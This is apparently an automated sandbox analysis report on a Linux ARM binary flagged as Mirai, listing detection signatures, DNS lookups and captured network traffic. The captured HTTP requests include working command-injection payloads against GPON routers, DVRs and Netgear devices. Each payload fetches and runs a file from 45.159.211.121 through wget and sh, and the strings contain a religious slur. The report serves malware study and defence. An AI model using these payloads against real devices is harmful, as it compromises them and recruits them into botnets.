Linux Analysis Report
firmware.armv4l.elf

Overview

General Information

Sample name: firmware.armv4l.elf
Analysis ID: 1502467
MD5: 5791d11575d52a0773716ce215a6c661
SHA1: 29d3d9042e1955b7d7619bd8d3edb5ebed00fec6
SHA256: 152ce9bf498ae4df1184e78d7570bdbe9d8660e8cb1bb2277cff79b7f6489c31
Tags: elffirmware
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Connects to many different domains
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes massive DNS lookups (> 100)
Executes the "hostname" command used to retrieve the computers name
HTTP GET or POST without a user agent
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: firmware.armv4l.elf Avira: detected
Antivirus detection for dropped file
Source: /usr/bin/mabxpzyo Avira: detection malicious, Label: LINUX/Mirai.bonb
Multi AV Scanner detection for submitted file
Source: firmware.armv4l.elf ReversingLabs: Detection: 52%
Source: firmware.armv4l.elf Virustotal: Detection: 56% Perma Link

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 49.54.56.46 ports 1,2,12846,4,6,8
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: klff.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.dadf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cebl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ffcb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fkka.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fbfa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dfcf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bbdl.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: fkfa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fkec.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.eckf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lbaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.felf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kffl.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fckc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cfee.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dfaf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.kffl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bcba.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bebe.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.bebe.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.alaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: klld.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: cfee.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lkck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dadf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.daac.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.afbl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aabk.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.lkck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cblf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lcck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cblf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: eckf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: klld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fkka.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.lfcc.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: lfcc.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: lfaf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: aabk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cbbf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.fkec.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bbck.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.bbdl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lbaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lcck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dbda.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ldkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ldkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fkfa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.klff.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aeel.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.klld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fckc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lfaf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: daac.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lfaf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dfcf.ru replaycode: Server failure (2)
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 43406 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43408 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43410 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43412 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43414 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 44744 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 44842 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52764 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57196 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57198 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57200 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57220 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57222 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57224 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33232 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34582 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34584 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34586 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36084 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36086 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36088 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 42566 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42570 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42572 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42574 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42576 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42578 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42580 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 35960 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35966 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35974 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35984 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35986 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35988 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35990 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 46950 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46952 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46954 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46956 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46958 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46960 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46980 -> 8082
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 191
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.13:41202 -> 32.10.0.0:0
Source: global traffic TCP traffic: 192.168.2.13:56962 -> 49.54.56.46:12846
Source: global traffic TCP traffic: 192.168.2.13:52202 -> 48.46.50.48:0
Source: global traffic TCP traffic: 192.168.2.13:37064 -> 8.8.8.8:81
Executes massive DNS lookups (> 100)
Source: global traffic DNS traffic detected: number of DNS queries: 191
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.15.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.153.249Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.37Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.51Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.68Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.67Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.138Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.105Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.105Connection: close
